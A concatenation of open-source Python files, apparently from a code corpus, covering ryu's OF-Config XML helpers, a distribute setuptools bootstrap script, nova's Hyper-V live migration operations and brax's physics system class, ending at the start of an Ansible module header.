        medium = Medium.info({'id': medium['id']})
        self.assertEqual(medium['name'], new_name)
| gpl-3.0 |
castroflavio/ryu | ryu/lib/of_config/base.py | 22 | 4331 | # Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2013 YAMAMOTO Takashi <yamamoto at valinux co jp>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# convenient classes to manipulate OF-Config XML
# in a little more pythonic way.
# currently assuming OF-Config 1.1.1.
from ryu.lib import stringify
from lxml import objectify
import lxml.etree as ET
_ns_of111 = 'urn:onf:of111:config:yang'
_ns_netconf = 'urn:ietf:params:xml:ns:netconf:base:1.0'
_nsmap = {
'of111': _ns_of111,
'nc': _ns_netconf,
}
def _pythonify(name):
return name.replace('-', '_')
class _e(object):
def __init__(self, name, is_list):
self.name = name
self.cls = None
self.is_list = is_list
# complexType
class _ct(_e):
    """Descriptor for a complexType element: like _e, but carries the
    _Base subclass used to (de)serialize the nested structure."""
    def __init__(self, name, cls, is_list):
        super(_ct, self).__init__(name, is_list)
        self.cls = cls
class _Base(stringify.StringifyMixin):
    """Common machinery for OF-Config objects: maps a declared _ELEMENTS
    schema (list of _e/_ct descriptors) to python attributes and converts
    to/from lxml element trees."""
    # Element factory bound to the OF-Config 1.1.1 namespace.
    _M = objectify.ElementMaker(annotate=False,
                                namespace=_ns_of111,
                                nsmap=_nsmap)
    def __init__(self, **kwargs):
        # Accept each element either under its pythonified name (dashes
        # replaced by underscores) or under its raw XML name.
        for e in self._ELEMENTS:
            k = _pythonify(e.name)
            try:
                v = kwargs.pop(k)
                # Passing both spellings of the same element is an error.
                assert e.name not in kwargs
            except KeyError:
                k = e.name
                try:
                    v = kwargs.pop(k)
                except KeyError:
                    # Missing elements default to [] (lists) or None.
                    if e.is_list:
                        v = []
                    else:
                        v = None
            setattr(self, k, v)
        if kwargs:
            raise TypeError('unknown kwargs %s' % kwargs)
    def to_et(self, tag):
        # NOTE: convert closes over the loop variables e/itag below.
        def convert(v):
            if isinstance(v, _Base):
                return v.to_et(e.name)
            elif isinstance(v, objectify.ObjectifiedElement):
                assert ET.QName(v.tag).localname == itag
                return v
            return self._M(itag, v)
        args = []
        for e in self._ELEMENTS:
            itag = e.name
            k = _pythonify(itag)
            v = getattr(self, k)
            if v is None:
                # Omit absent optional elements entirely.
                continue
            if isinstance(v, list):
                assert e.is_list
                ele = map(convert, v)
            else:
                assert not e.is_list
                ele = [convert(v)]
            args.extend(ele)
        return self._M(tag, *args)
    def to_xml(self, tag):
        e = self.to_et(tag)
        return ET.tostring(e, pretty_print=True)
    @classmethod
    def from_xml(cls, xmlstring):
        et = objectify.fromstring(xmlstring)
        return cls.from_et(et)
    @classmethod
    def from_et(cls, et):
        # Nested complex types (descriptor has .cls) recurse; leaves pass
        # the objectified value through unchanged.
        def convert(v):
            if e.cls is not None:
                return e.cls.from_et(v)
            return v
        kwargs = {}
        for e in cls._ELEMENTS:
            try:
                v = et[e.name]
            except AttributeError:
                # Element not present in the document; keep the default.
                continue
            assert isinstance(v, objectify.ObjectifiedElement)
            if len(v) == 1:
                v = convert(v)
                if e.is_list:
                    v = [v]
            else:
                assert e.is_list
                v = map(convert, v)
            k = _pythonify(e.name)
            assert k not in kwargs
            kwargs[k] = v
        return cls(**kwargs)
    def __getattribute__(self, k):
        # Allow attribute access under either spelling (dash or underscore).
        return stringify.StringifyMixin.__getattribute__(self, _pythonify(k))
    def __setattr__(self, k, v):
        stringify.StringifyMixin.__setattr__(self, _pythonify(k), v)
class _Unimpl(_Base):
    """Fallback for schema parts not modelled yet: stores the raw element
    tree untouched and echoes it back on serialization."""
    _ELEMENTS = [
        _e('raw_et', is_list=False),
    ]
    def to_et(self, tag):
        assert self.raw_et.tag == tag
        return self.raw_et
    @classmethod
    def from_et(cls, et):
        return cls(raw_et=et)
| apache-2.0 |
abhishek-ch/hue | desktop/core/ext-py/Mako-0.8.1/distribute_setup.py | 64 | 15757 | #!python
"""Bootstrap distribute installation
If you want to use setuptools in your package's setup.py, just include this
file in the same directory with it, and add this to the top of your setup.py::
from distribute_setup import use_setuptools
use_setuptools()
If you want to require a specific version of setuptools, set a download
mirror, or use an alternate download directory, you can do so by supplying
the appropriate options to ``use_setuptools()``.
This file can also be run as a script to install or upgrade setuptools.
"""
import os
import sys
import time
import fnmatch
import tempfile
import tarfile
from distutils import log
try:
from site import USER_SITE
except ImportError:
USER_SITE = None
try:
import subprocess
def _python_cmd(*args):
args = (sys.executable,) + args
return subprocess.call(args) == 0
except ImportError:
# will be used for python 2.3
def _python_cmd(*args):
args = (sys.executable,) + args
# quoting arguments if windows
if sys.platform == 'win32':
def quote(arg):
if ' ' in arg:
return '"%s"' % arg
return arg
args = [quote(arg) for arg in args]
return os.spawnl(os.P_WAIT, sys.executable, *args) == 0
DEFAULT_VERSION = "0.6.13"
DEFAULT_URL = "http://pypi.python.org/packages/source/d/distribute/"
SETUPTOOLS_FAKED_VERSION = "0.6c11"
SETUPTOOLS_PKG_INFO = """\
Metadata-Version: 1.0
Name: setuptools
Version: %s
Summary: xxxx
Home-page: xxx
Author: xxx
Author-email: xxx
License: xxx
Description: xxx
""" % SETUPTOOLS_FAKED_VERSION
def _install(tarball):
    """Unpack *tarball* into a temporary directory and run its
    ``setup.py install``; working directory is restored afterwards."""
    # extracting the tarball
    tmpdir = tempfile.mkdtemp()
    log.warn('Extracting in %s', tmpdir)
    old_wd = os.getcwd()
    try:
        os.chdir(tmpdir)
        tar = tarfile.open(tarball)
        _extractall(tar)
        tar.close()
        # going in the directory
        subdir = os.path.join(tmpdir, os.listdir(tmpdir)[0])
        os.chdir(subdir)
        log.warn('Now working in %s', subdir)
        # installing
        log.warn('Installing Distribute')
        if not _python_cmd('setup.py', 'install'):
            log.warn('Something went wrong during the installation.')
            log.warn('See the error message above.')
    finally:
        # Always restore the caller's working directory.
        os.chdir(old_wd)
def _build_egg(egg, tarball, to_dir):
    """Unpack *tarball* and build an egg into *to_dir*; raise IOError if
    the expected *egg* file does not exist afterwards."""
    # extracting the tarball
    tmpdir = tempfile.mkdtemp()
    log.warn('Extracting in %s', tmpdir)
    old_wd = os.getcwd()
    try:
        os.chdir(tmpdir)
        tar = tarfile.open(tarball)
        _extractall(tar)
        tar.close()
        # going in the directory
        subdir = os.path.join(tmpdir, os.listdir(tmpdir)[0])
        os.chdir(subdir)
        log.warn('Now working in %s', subdir)
        # building an egg
        log.warn('Building a Distribute egg in %s', to_dir)
        _python_cmd('setup.py', '-q', 'bdist_egg', '--dist-dir', to_dir)
    finally:
        os.chdir(old_wd)
    # returning the result
    log.warn(egg)
    if not os.path.exists(egg):
        raise IOError('Could not build the egg.')
def _do_download(version, download_base, to_dir, download_delay):
    """Download and build the distribute egg (if not already present),
    then make it importable by prepending it to sys.path."""
    egg = os.path.join(to_dir, 'distribute-%s-py%d.%d.egg'
                       % (version, sys.version_info[0], sys.version_info[1]))
    if not os.path.exists(egg):
        tarball = download_setuptools(version, download_base,
                                      to_dir, download_delay)
        _build_egg(egg, tarball, to_dir)
    sys.path.insert(0, egg)
    import setuptools
    # Tell setuptools where it was bootstrapped from.
    setuptools.bootstrap_install_from = egg
def use_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
                   to_dir=os.curdir, download_delay=15, no_fake=True):
    """Ensure a distribute release >= *version* is importable, downloading
    and bootstrapping it into *to_dir* if necessary."""
    # making sure we use the absolute path
    to_dir = os.path.abspath(to_dir)
    was_imported = 'pkg_resources' in sys.modules or \
        'setuptools' in sys.modules
    try:
        try:
            import pkg_resources
            # pkg_resources without the _distribute marker means plain
            # setuptools is installed: optionally fake it out of the way,
            # then fall through to downloading distribute.
            if not hasattr(pkg_resources, '_distribute'):
                if not no_fake:
                    _fake_setuptools()
                raise ImportError
        except ImportError:
            return _do_download(version, download_base, to_dir, download_delay)
        try:
            pkg_resources.require("distribute>="+version)
            return
        except pkg_resources.VersionConflict:
            e = sys.exc_info()[1]
            if was_imported:
                # Too late to swap implementations in-process; ask the user
                # to upgrade manually.
                sys.stderr.write(
                "The required version of distribute (>=%s) is not available,\n"
                "and can't be installed while this script is running. Please\n"
                "install a more recent version first, using\n"
                "'easy_install -U distribute'."
                "\n\n(Currently using %r)\n" % (version, e.args[0]))
                sys.exit(2)
            else:
                del pkg_resources, sys.modules['pkg_resources']  # reload ok
                return _do_download(version, download_base, to_dir,
                                    download_delay)
        except pkg_resources.DistributionNotFound:
            return _do_download(version, download_base, to_dir,
                                download_delay)
    finally:
        if not no_fake:
            _create_fake_setuptools_pkg_info(to_dir)
def download_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
                        to_dir=os.curdir, delay=15):
    """Download distribute from a specified location and return its filename
    `version` should be a valid distribute version number that is available
    as an egg for download under the `download_base` URL (which should end
    with a '/'). `to_dir` is the directory where the egg will be downloaded.
    `delay` is the number of seconds to pause before an actual download
    attempt.
    """
    # NOTE(review): the *delay* parameter is documented above but never
    # used in this implementation.
    # making sure we use the absolute path
    to_dir = os.path.abspath(to_dir)
    try:
        from urllib.request import urlopen
    except ImportError:
        from urllib2 import urlopen
    tgz_name = "distribute-%s.tar.gz" % version
    url = download_base + tgz_name
    saveto = os.path.join(to_dir, tgz_name)
    src = dst = None
    if not os.path.exists(saveto):  # Avoid repeated downloads
        try:
            log.warn("Downloading %s", url)
            src = urlopen(url)
            # Read/write all in one block, so we don't create a corrupt file
            # if the download is interrupted.
            data = src.read()
            dst = open(saveto, "wb")
            dst.write(data)
        finally:
            if src:
                src.close()
            if dst:
                dst.close()
    return os.path.realpath(saveto)
def _no_sandbox(function):
    """Decorator: run *function* with the setuptools DirectorySandbox
    violation check temporarily disabled (restored afterwards)."""
    def __no_sandbox(*args, **kw):
        try:
            from setuptools.sandbox import DirectorySandbox
            if not hasattr(DirectorySandbox, '_old'):
                def violation(*args):
                    # Swallow sandbox violations while patched.
                    pass
                DirectorySandbox._old = DirectorySandbox._violation
                DirectorySandbox._violation = violation
                patched = True
            else:
                # Already patched by an outer call; do not double-patch.
                patched = False
        except ImportError:
            patched = False
        try:
            return function(*args, **kw)
        finally:
            if patched:
                DirectorySandbox._violation = DirectorySandbox._old
                del DirectorySandbox._old
    return __no_sandbox
def _patch_file(path, content):
    """Will backup the file then patch it"""
    existing_content = open(path).read()
    if existing_content == content:
        # already patched
        log.warn('Already patched.')
        return False
    log.warn('Patching...')
    # Keep the original around under a timestamped name before overwriting.
    _rename_path(path)
    f = open(path, 'w')
    try:
        f.write(content)
    finally:
        f.close()
    return True
_patch_file = _no_sandbox(_patch_file)
def _same_content(path, content):
return open(path).read() == content
def _rename_path(path):
    """Move *path* aside to a timestamped '.OLD' name and return the
    new name."""
    new_name = path + '.OLD.%s' % time.time()
    log.warn('Renaming %s into %s', path, new_name)
    os.rename(path, new_name)
    return new_name
def _remove_flat_installation(placeholder):
    """Move a flat (non-egg) setuptools installation out of the way.

    Looks for a setuptools*.egg-info entry under *placeholder*, replaces
    its metadata with the fake PKG-INFO, and renames the setuptools
    package files aside.  Returns True on success, False when there is
    nothing to do (not a directory, or already patched).
    """
    if not os.path.isdir(placeholder):
        # Fixed typo in the log message ('Unkown' -> 'Unknown').
        log.warn('Unknown installation at %s', placeholder)
        return False
    found = False
    for file in os.listdir(placeholder):
        if fnmatch.fnmatch(file, 'setuptools*.egg-info'):
            found = True
            break
    if not found:
        log.warn('Could not locate setuptools*.egg-info')
        return
    log.warn('Removing elements out of the way...')
    pkg_info = os.path.join(placeholder, file)
    # egg-info may be a directory (newer layouts) or a single file.
    if os.path.isdir(pkg_info):
        patched = _patch_egg_dir(pkg_info)
    else:
        patched = _patch_file(pkg_info, SETUPTOOLS_PKG_INFO)
    if not patched:
        log.warn('%s already patched.', pkg_info)
        return False
    # now let's move the files out of the way
    for element in ('setuptools', 'pkg_resources.py', 'site.py'):
        element = os.path.join(placeholder, element)
        if os.path.exists(element):
            _rename_path(element)
        else:
            log.warn('Could not find the %s element of the '
                     'Setuptools distribution', element)
    return True
_remove_flat_installation = _no_sandbox(_remove_flat_installation)
def _after_install(dist):
    """'after install' bootstrap hook: fake the setuptools metadata.

    *dist* is the distutils Distribution that was just installed; its
    'install' command object tells us where pure-Python modules landed.
    """
    log.warn('After install bootstrap.')
    placeholder = dist.get_command_obj('install').install_purelib
    _create_fake_setuptools_pkg_info(placeholder)
def _create_fake_setuptools_pkg_info(placeholder):
    """Create a fake setuptools egg-info file plus a matching .pth entry.

    Writes the fake PKG-INFO metadata into *placeholder* and registers it
    through a 'setuptools.pth' file so pkg_resources believes setuptools
    is installed.  Does nothing when *placeholder* is missing or the
    egg-info already exists.
    """
    if not placeholder or not os.path.exists(placeholder):
        log.warn('Could not find the install location')
        return

    def _write(dest, data):
        # write *data* to *dest*, always closing the handle
        log.warn('Creating %s', dest)
        handle = open(dest, 'w')
        try:
            handle.write(data)
        finally:
            handle.close()

    pyver = '%s.%s' % (sys.version_info[0], sys.version_info[1])
    setuptools_file = 'setuptools-%s-py%s.egg-info' % (
        SETUPTOOLS_FAKED_VERSION, pyver)
    pkg_info = os.path.join(placeholder, setuptools_file)
    if os.path.exists(pkg_info):
        log.warn('%s already exists', pkg_info)
        return

    _write(pkg_info, SETUPTOOLS_PKG_INFO)
    pth_file = os.path.join(placeholder, 'setuptools.pth')
    _write(pth_file, os.path.join(os.curdir, setuptools_file))

_create_fake_setuptools_pkg_info = _no_sandbox(_create_fake_setuptools_pkg_info)
def _patch_egg_dir(path):
    """Replace the egg directory at *path* with a stub carrying fake PKG-INFO.

    Returns False when the egg already holds the fake metadata (nothing to
    do), True after the replacement was made.
    """
    pkg_info = os.path.join(path, 'EGG-INFO', 'PKG-INFO')
    # already patched?  leave it alone
    if os.path.exists(pkg_info) and _same_content(pkg_info, SETUPTOOLS_PKG_INFO):
        log.warn('%s already patched.', pkg_info)
        return False
    # move the real egg aside and build a skeleton in its place
    _rename_path(path)
    os.mkdir(path)
    os.mkdir(os.path.join(path, 'EGG-INFO'))
    handle = open(pkg_info, 'w')
    try:
        handle.write(SETUPTOOLS_PKG_INFO)
    finally:
        handle.close()
    return True

_patch_egg_dir = _no_sandbox(_patch_egg_dir)
def _before_install():
    """'before install' bootstrap hook: neutralize any real setuptools."""
    log.warn('Before install bootstrap.')
    _fake_setuptools()
def _under_prefix(location):
    """Return True when *location* lies under the requested install prefix.

    Inspects the arguments following 'install' on sys.argv for '--root',
    '--prefix' (both '=value' and separate-token forms) and '--user'.
    When no such option constrains the install, every location qualifies.
    """
    if 'install' not in sys.argv:
        return True
    args = sys.argv[sys.argv.index('install') + 1:]
    for index, arg in enumerate(args):
        for option in ('--root', '--prefix'):
            if arg.startswith('%s=' % option):
                # bugfix: the old code always split on 'root=', so
                # '--prefix=/x' yielded '--prefix=/x' as the top dir;
                # split on the option that actually matched
                top_dir = arg.split('%s=' % option)[-1]
                return location.startswith(top_dir)
            elif arg == option:
                # bugfix: 'len(args) > index' is always true (arg is
                # args[index]); guard the *next* token instead so a
                # trailing bare option cannot raise IndexError
                if len(args) > index + 1:
                    top_dir = args[index + 1]
                    return location.startswith(top_dir)
        if arg == '--user' and USER_SITE is not None:
            return location.startswith(USER_SITE)
    return True
def _fake_setuptools():
    """Locate an installed setuptools and replace it with fake metadata.

    When a real setuptools distribution is found (and lies under the
    requested install prefix), its egg or flat installation is patched so
    pkg_resources reports Distribute's fake setuptools instead, and the
    process is relaunched to pick up the change.
    """
    log.warn('Scanning installed packages')
    try:
        import pkg_resources
    except ImportError:
        # we're cool
        log.warn('Setuptools or Distribute does not seem to be installed.')
        return
    ws = pkg_resources.working_set
    try:
        # NOTE(review): 'replacement=False' is presumably only accepted by
        # an older Distribute pkg_resources; newer ones raise TypeError,
        # handled by the fallback below — confirm against the targeted API.
        setuptools_dist = ws.find(pkg_resources.Requirement.parse('setuptools',
                                  replacement=False))
    except TypeError:
        # old distribute API
        setuptools_dist = ws.find(pkg_resources.Requirement.parse('setuptools'))

    if setuptools_dist is None:
        log.warn('No setuptools distribution found')
        return
    # detecting if it was already faked
    setuptools_location = setuptools_dist.location
    log.warn('Setuptools installation detected at %s', setuptools_location)

    # if --root or --prefix was provided, and if
    # setuptools is not located in them, we don't patch it
    if not _under_prefix(setuptools_location):
        log.warn('Not patching, --root or --prefix is installing Distribute'
                 ' in another location')
        return

    # let's see if its an egg
    if not setuptools_location.endswith('.egg'):
        log.warn('Non-egg installation')
        res = _remove_flat_installation(setuptools_location)
        if not res:
            return
    else:
        log.warn('Egg installation')
        pkg_info = os.path.join(setuptools_location, 'EGG-INFO', 'PKG-INFO')
        if (os.path.exists(pkg_info) and
                _same_content(pkg_info, SETUPTOOLS_PKG_INFO)):
            log.warn('Already patched.')
            return
        log.warn('Patching...')
        # let's create a fake egg replacing setuptools one
        res = _patch_egg_dir(setuptools_location)
        if not res:
            return
    log.warn('Patched done.')
    _relaunch()
def _relaunch():
    """Re-execute the current setup.py run under the freshly faked setuptools."""
    log.warn('Relaunching...')
    # we have to relaunch the process
    # pip marker to avoid a relaunch bug
    # NOTE(review): comparing sys.argv[:3] to this exact triple assumes a
    # specific pip invocation shape ('-c install ...'); confirm against the
    # pip version this workaround targets.
    if sys.argv[:3] == ['-c', 'install', '--single-version-externally-managed']:
        sys.argv[0] = 'setup.py'
    args = [sys.executable] + sys.argv
    # replace this process's exit status with the relaunched install's
    sys.exit(subprocess.call(args))
def _extractall(self, path=".", members=None):
    """Extract all members from the archive to the current working
    directory and set owner, modification time and permissions on
    directories afterwards. `path' specifies a different directory
    to extract to. `members' is optional and must be a subset of the
    list returned by getmembers().

    Note: written to be bound as a TarFile method (*self* is a TarFile;
    it calls self.extract/chown/utime/chmod) for Pythons whose tarfile
    lacks extractall.
    """
    import copy
    import operator
    from tarfile import ExtractError
    directories = []
    if members is None:
        members = self
    for tarinfo in members:
        if tarinfo.isdir():
            # Extract directories with a safe mode.
            directories.append(tarinfo)
            tarinfo = copy.copy(tarinfo)
            tarinfo.mode = 448  # decimal for oct 0700
        self.extract(tarinfo, path)
    # Reverse sort directories.
    if sys.version_info < (2, 4):
        # NOTE(review): 'cmp' exists only on Python 2 — this branch is
        # exclusively for interpreters older than 2.4.
        def sorter(dir1, dir2):
            return cmp(dir1.name, dir2.name)
        directories.sort(sorter)
        directories.reverse()
    else:
        # deepest paths first, so children get their metadata before parents
        directories.sort(key=operator.attrgetter('name'), reverse=True)
    # Set correct owner, mtime and filemode on directories.
    for tarinfo in directories:
        dirpath = os.path.join(path, tarinfo.name)
        try:
            self.chown(tarinfo, dirpath)
            self.utime(tarinfo, dirpath)
            self.chmod(tarinfo, dirpath)
        except ExtractError:
            e = sys.exc_info()[1]
            if self.errorlevel > 1:
                raise
            else:
                self._dbg(1, "tarfile: %s" % e)
def main(argv, version=DEFAULT_VERSION):
    """Install or upgrade setuptools and EasyInstall"""
    # NOTE(review): both 'argv' and 'version' are accepted but unused —
    # download_setuptools() is called with its defaults; confirm whether
    # the requested version should be forwarded.
    tarball = download_setuptools()
    _install(tarball)


if __name__ == '__main__':
    main(sys.argv[1:])
| apache-2.0 |
plumgrid/plumgrid-nova | nova/virt/hyperv/livemigrationops.py | 12 | 4920 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Management class for live migration VM operations.
"""
import functools
from oslo.config import cfg
from nova.openstack.common import excutils
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.virt.hyperv import imagecache
from nova.virt.hyperv import utilsfactory
from nova.virt.hyperv import volumeops
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.import_opt('use_cow_images', 'nova.virt.driver')
def check_os_version_requirement(function):
    """Decorator guarding *function* behind live-migration availability.

    The wrapped method raises NotImplementedError when the instance's
    _livemigrutils attribute is unset (i.e. the host predates Hyper-V
    Server 2012); otherwise the original method runs unchanged.
    """
    @functools.wraps(function)
    def _checked(self, *args, **kwargs):
        if not self._livemigrutils:
            raise NotImplementedError(_('Live migration is supported '
                                        'starting with Hyper-V Server '
                                        '2012'))
        return function(self, *args, **kwargs)
    return _checked
class LiveMigrationOps(object):
    """Management class for Hyper-V live migration VM operations."""

    def __init__(self):
        # Live migration is supported starting from Hyper-V Server 2012
        if utilsfactory.get_hostutils().check_min_windows_version(6, 2):
            self._livemigrutils = utilsfactory.get_livemigrationutils()
        else:
            self._livemigrutils = None  # guarded by check_os_version_requirement
        self._pathutils = utilsfactory.get_pathutils()
        self._volumeops = volumeops.VolumeOps()
        self._imagecache = imagecache.ImageCache()

    @check_os_version_requirement
    def live_migration(self, context, instance_ref, dest, post_method,
                       recover_method, block_migration=False,
                       migrate_data=None):
        """Live migrate instance_ref to *dest*.

        Logs out of the iSCSI targets the VM was using afterwards.  On
        failure, calls recover_method before re-raising; on success,
        calls post_method.
        """
        LOG.debug(_("live_migration called"), instance=instance_ref)
        instance_name = instance_ref["name"]

        try:
            iscsi_targets = self._livemigrutils.live_migrate_vm(instance_name,
                                                                dest)
            for (target_iqn, target_lun) in iscsi_targets:
                self._volumeops.logout_storage_target(target_iqn)
        except Exception:
            with excutils.save_and_reraise_exception():
                LOG.debug(_("Calling live migration recover_method "
                            "for instance: %s"), instance_name)
                recover_method(context, instance_ref, dest, block_migration)

        LOG.debug(_("Calling live migration post_method for instance: %s"),
                  instance_name)
        post_method(context, instance_ref, dest, block_migration)

    @check_os_version_requirement
    def pre_live_migration(self, context, instance, block_device_info,
                           network_info):
        """Prepare this host to receive *instance*.

        Validates the live-migration configuration, warms the image cache
        (unless the instance boots from a volume) and logs in to the
        instance's storage targets.
        """
        LOG.debug(_("pre_live_migration called"), instance=instance)
        self._livemigrutils.check_live_migration_config()

        if CONF.use_cow_images:
            boot_from_volume = self._volumeops.ebs_root_in_block_devices(
                block_device_info)
            if not boot_from_volume:
                self._imagecache.get_cached_image(context, instance)

        self._volumeops.login_storage_targets(block_device_info)

    @check_os_version_requirement
    def post_live_migration_at_destination(self, ctxt, instance_ref,
                                           network_info, block_migration):
        """No-op hook run on the destination after a successful migration."""
        LOG.debug(_("post_live_migration_at_destination called"),
                  instance=instance_ref)

    @check_os_version_requirement
    def check_can_live_migrate_destination(self, ctxt, instance_ref,
                                           src_compute_info, dst_compute_info,
                                           block_migration=False,
                                           disk_over_commit=False):
        """Return destination check data (nothing needed on Hyper-V).

        Bugfix: instance_ref was passed to LOG.debug positionally, where
        logging treats it as a %-format argument; the message has no
        conversion specifier, so rendering the record would fail.  Use the
        'instance' keyword, consistent with the other methods here.
        """
        LOG.debug(_("check_can_live_migrate_destination called"),
                  instance=instance_ref)
        return {}

    @check_os_version_requirement
    def check_can_live_migrate_destination_cleanup(self, ctxt,
                                                   dest_check_data):
        """No-op cleanup counterpart of the destination check."""
        LOG.debug(_("check_can_live_migrate_destination_cleanup called"))

    @check_os_version_requirement
    def check_can_live_migrate_source(self, ctxt, instance_ref,
                                      dest_check_data):
        """Return *dest_check_data* unchanged (no source-side checks).

        Bugfix: same positional-vs-keyword logging issue as
        check_can_live_migrate_destination; pass instance_ref as the
        'instance' keyword.
        """
        LOG.debug(_("check_can_live_migrate_source called"),
                  instance=instance_ref)
        return dest_check_data
| apache-2.0 |
google/brax | brax/physics/system.py | 1 | 5576 | # Copyright 2021 The Brax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint:disable=g-multiple-import
"""A brax system."""
import functools
from typing import Tuple
import jax
import jax.numpy as jnp
from brax.physics import actuators
from brax.physics import colliders
from brax.physics import config_pb2
from brax.physics import integrators
from brax.physics import joints
from brax.physics import tree
from brax.physics.base import Info, P, QP, validate_config, vec_to_np
class System:
  """A brax system.

  Builds bodies, colliders, joints and actuators from a validated
  config_pb2.Config, and exposes jitted helpers to construct a default
  state (default_qp), inspect a state (info) and advance the simulation
  (step).
  """

  def __init__(self, config: config_pb2.Config):
    self.config = validate_config(config)

    self.num_bodies = len(config.bodies)
    # body name -> row index into the stacked per-body arrays below
    self.body_idx = {b.name: i for i, b in enumerate(config.bodies)}

    # 1.0 where a positional/rotational DoF is active, 0.0 where frozen
    # (shape (num_bodies, 3), from one vec per body)
    self.active_pos = 1. * jnp.logical_not(
        jnp.array([vec_to_np(b.frozen.position) for b in config.bodies]))
    self.active_rot = 1. * jnp.logical_not(
        jnp.array([vec_to_np(b.frozen.rotation) for b in config.bodies]))

    # collision handlers, one per supported shape pair
    self.box_plane = colliders.BoxPlane(config)
    self.capsule_plane = colliders.CapsulePlane(config)
    self.capsule_capsule = colliders.CapsuleCapsule(config)

    # joints grouped by type (revolute / universal / spherical)
    self.num_joints = len(config.joints)
    self.joint_revolute = joints.Revolute.from_config(config)
    self.joint_universal = joints.Universal.from_config(config)
    self.joint_spherical = joints.Spherical.from_config(config)

    # actuators: an angle and a torque actuator set per joint type
    self.num_actuators = len(config.actuators)
    self.num_joint_dof = sum(len(j.angle_limit) for j in config.joints)
    self.angle_1d = actuators.Angle.from_config(config, self.joint_revolute)
    self.angle_2d = actuators.Angle.from_config(config, self.joint_universal)
    self.angle_3d = actuators.Angle.from_config(config, self.joint_spherical)
    self.torque_1d = actuators.Torque.from_config(config, self.joint_revolute)
    self.torque_2d = actuators.Torque.from_config(config, self.joint_universal)
    self.torque_3d = actuators.Torque.from_config(config, self.joint_spherical)

  @functools.partial(jax.jit, static_argnums=(0,))
  def default_qp(self) -> QP:
    """Returns a default state for the system."""
    root = tree.Link.from_config(self.config).to_world()

    # raise any sub-trees above the ground plane
    child_min_z = [(child, child.min_z()) for child in root.children]

    # construct qps array that matches bodies order
    qps = []
    for body in self.config.bodies:
      # identity pose by default; overwritten if the body appears in a tree
      pos = jnp.array([0., 0., 0.])
      rot = jnp.array([1., 0., 0., 0.])
      for child, min_z in child_min_z:
        link = child.rfind(body.name)
        if link:
          # lift by the sub-tree's lowest point so it sits on the plane
          pos = link.pos - min_z * jnp.array([0., 0., 1.])
          rot = link.rot
      qp = QP(pos=pos, rot=rot, vel=jnp.zeros(3), ang=jnp.zeros(3))
      qps.append(qp)

    # stack the per-body QPs into one QP of batched arrays
    return jax.tree_multimap((lambda *args: jnp.stack(args)), *qps)

  @functools.partial(jax.jit, static_argnums=(0,))
  def info(self, qp: QP) -> Info:
    """Return info about a system state."""
    # impulses each subsystem would apply at this state (unit dt for contacts)
    dp_c = self.box_plane.apply(qp, 1.)
    dp_c += self.capsule_plane.apply(qp, 1.)
    dp_c += self.capsule_capsule.apply(qp, 1.)

    dp_j = self.joint_revolute.apply(qp)
    dp_j += self.joint_universal.apply(qp)
    dp_j += self.joint_spherical.apply(qp)

    # no actions supplied here, so actuator contribution is zero
    dp_a = P(jnp.zeros((self.num_bodies, 3)), jnp.zeros((self.num_bodies, 3)))

    info = Info(contact=dp_c, joint=dp_j, actuator=dp_a)
    return info

  @functools.partial(jax.jit, static_argnums=(0,))
  def step(self, qp: QP, act: jnp.ndarray) -> Tuple[QP, Info]:
    """Calculates a physics step for a system, returns next state and info."""

    def substep(carry, _):
      # one integration sub-step; Info accumulates impulses across sub-steps
      qp, info = carry
      dt = self.config.dt / self.config.substeps

      # apply kinetic step
      qp = integrators.kinetic(self.config, qp, dt, self.active_pos,
                               self.active_rot)

      # apply impulses arising from joints and actuators
      dp_j = self.joint_revolute.apply(qp)
      dp_j += self.joint_universal.apply(qp)
      dp_j += self.joint_spherical.apply(qp)

      dp_a = self.angle_1d.apply(qp, act)
      dp_a += self.angle_2d.apply(qp, act)
      dp_a += self.angle_3d.apply(qp, act)
      dp_a += self.torque_1d.apply(qp, act)
      dp_a += self.torque_2d.apply(qp, act)
      dp_a += self.torque_3d.apply(qp, act)

      qp = integrators.potential(self.config, qp, dp_j + dp_a, dt,
                                 self.active_pos, self.active_rot)

      # apply collision velocity updates
      dp_c = self.box_plane.apply(qp, dt)
      dp_c += self.capsule_plane.apply(qp, dt)
      dp_c += self.capsule_capsule.apply(qp, dt)
      qp = integrators.potential_collision(self.config, qp, dp_c,
                                           self.active_pos, self.active_rot)

      info = Info(
          contact=info.contact + dp_c,
          joint=info.joint + dp_j,
          actuator=info.actuator + dp_a)

      return (qp, info), ()

    # start with zero accumulated impulses, then scan over the sub-steps
    zero = P(jnp.zeros((self.num_bodies, 3)), jnp.zeros((self.num_bodies, 3)))
    info = Info(contact=zero, joint=zero, actuator=zero)
    (qp, info), _ = jax.lax.scan(substep, (qp, info), (), self.config.substeps)
    return qp, info
| apache-2.0 |
pilou-/ansible | lib/ansible/modules/cloud/vmware/vmware_tag.py | 7 | 8097 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Ansible Project
